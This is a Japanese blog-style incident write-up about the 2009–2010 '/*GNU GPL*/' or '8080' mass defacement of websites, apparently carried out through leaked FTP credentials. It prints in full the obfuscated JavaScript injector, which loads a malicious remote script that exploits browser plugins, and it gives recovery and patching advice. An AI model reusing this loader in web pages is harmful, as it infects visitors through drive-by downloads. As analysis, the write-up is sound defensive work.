/*GNU GPL*/改竄
Web系
概要
2009-2010の年末年始あたりに大流行?した改竄。
私自身も年始に複数サイトを同時に喰らいました(>_<)
まさに同時多発テロ状態です(/_\;)
以下のようなscriptがファイルの最後に埋め込まれます。
※実際にはは1行
<script>/*GNU GPL*/ try{window.onload = function(){var E5znf5vmmzoku1 = document.createElement ('s@!^c^&r#!!i!(^p#@&t^&^@'.replace(/&|\!|\^|\)|\(|#|@|\$/ig, ''));var Ty7nddn1jfkw = 'Aqeg70s ospg';E5znf5vmmzoku1.setAttribute('type', 't(&e$x(t(^/!)#j^a!$v&^!#a&(^s#@c!$r^@((i@!)p#^$t@'. replace(/\!|@|&|\$|#|\)|\(|\^/ig, ''));E5znf5vmmzoku1.setAttribute('src', 'h&$!t&@t^p$(^:@$/^ @/((b&$$)t)^@j)^#u!!(!n&()(#k!i!&e$#-#$o(r!(!#!g#$.#d##$t^(!!i$^^b@l))o$g!$&.$c!@o@(&!&m$.@(^$ h!)(i!()(5$!-@)c^(o!)!@m#().$@&w&&e)#$b^)p$o(w&()e!&r^(g(u&^i#(d@^e$#.$@#r#&!u#^^(:!(@@8&^@)0# 8()@0#/$)g@@o@@#o!#g(@!l^)e^!^^!.@^)#c!&(o^@m$&/@)()g)@&@o#(#o#$g^l^!)e#$@@(.@#(c!o!&#m#)!&/&& !p&^&#c$#)^h@(#.$)c!@o)#$)m(&#&/)&#g)!!o$o)!#$!g&&!l^e(&.@^(#e^)s(@)/@(s)^e!()&)a$^)#r&^#s!&^. #@(c^o)@&@m$)(/!&'.replace(/&|\!|@|\$|#|\(|\^|\)/ig, ''));E5znf5vmmzoku1.setAttribute('defer', 'd&^@e@f!e()r&^'.replace(/\^|\(|\!|\)|&|\$|@|#/ig, ''));E5znf5vmmzoku1.setAttribute('id', 'G^ 2#)l$7$4@)j)^@#)i!q&($5!!@m(6&@)j!a)@$'.replace(/&|\$|\^|\!|@|\)|\(|#/ig, ''));document.body.a ppendChild(E5znf5vmmzoku1);}} catch(Aju9y6o2rniw6) {}</script> <!--3bea08d25332fa6e1393a4075b10cacc-->
※1/8追記
※/*LGPL*/となる新種が出た模様。
※改竄されたファイルも次々とGNU GPL→LGPLに変更されていく勢い。
影響
この改竄されたファイルをブラウザで参照すると、scriptがJavaScriptと解釈され、実行されます。
上記のように非常に分かりにくく書かれていますが、実行されると指定されたサイトを読み込みます。
サイトは様々あるようですが、Port 8080であることが多いようで、そのため一般的には8080と呼ばれているようです。
ちなみに似たようなタイプとして、Gumblar, GENOと呼ばれるものもあるが、どの辺が異なるのかは不明(/_\;)
指定されたサイトを読み込むと、いわゆる不正なファイルをダウンロードさせられるようです。
そして、Windows、Acrobat Reader、Flash等の脆弱性を片っ端からつくような動きとなるようです。
※詳細不明。情報求む。
原因
ドメインレベルでいうとそれこそ100サイトレベルの数で改竄されたのですが、ftp のログを見ると、明らかに怪しいIPからftp接続が来ており、download/uploadが正常に行われています。
その前に ftp へのアタック等は見られないので、ログを見る限り普通に接続して普通にリクエストが飛んできています。
また、sftpで管理しているサイトは全く被害がありません。
従って、ftpを悪用されたのは確実。そして、おそらく私の場合には、改竄された原因はftpのアカウントの流出と思われます。
ちなみに、私自身が持っているアカウントではなく、顧客が持っているアカウントが流出したと思われるのでタチが悪い。
というか、私はftpは使わないのでアカウント情報なんて基本的に持っていないし(^_^;
復旧
基本的には、改竄はftpによるupload可能な範囲のみなので、サーバ自体はftpで更新可能な範囲をまっさらにした後、バックアップから戻せばOKだと思います。
問題なのは改竄されたサイトを見た方ですね。
見てしまった場合には、いわゆるウイルスチェッカーの類でブロック(通常表示が出る)されていれば問題ないですが、普通に見てしまった場合には不正ファイルがダウンロードされている可能性があります。
ウイルスに感染したら
有用なので2chの情報をとりあえずコピペしておきます。
Windows Update / Microsoft Updateで更新する。
※XP以下は念のためMicrosoft Updateに変更してアップデートする
Adobe Reader(Acrobat,Acrobat Reader)を更新する。
[ヘルプ] → [アップデートの有無をチェック]
Acrobat Javascriptをオフにする
[編集] → [環境設定] → [Javascript] → 「Acrobat Javascriptを使用」のチェックを外す
Adobe Flash Playerを更新。
ブラウザごとに異なるので、それぞれ更新する必要がある。
http://get.adobe.com/jp/flashplayer/
http://www.adobe.com/jp/shockwave/download/alternates/#fp
Flash Playerのバージョン確認
http://www.adobe.com/jp/software/flash/about/
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
Adobe Shockwave Playerを更新
※最近は使わないはずなのでアンインストールが好ましい。
http://www.adobe.com/jp/shockwave/download/alternates/#sp
Java Runtime Environmentを更新
※Javaを使わないのであればアンインストールが好ましい。
http://www.java.com/ja/
Javaのバージョン確認
http://www.java.com/ja/download/installed.jsp
QuickTimeを更新
※使っていないならアンインストール
http://www.apple.com/jp/quicktime/download/
RealPlayerを更新
※使っていないならアンインストール
http://jp.real.com/?mode=basic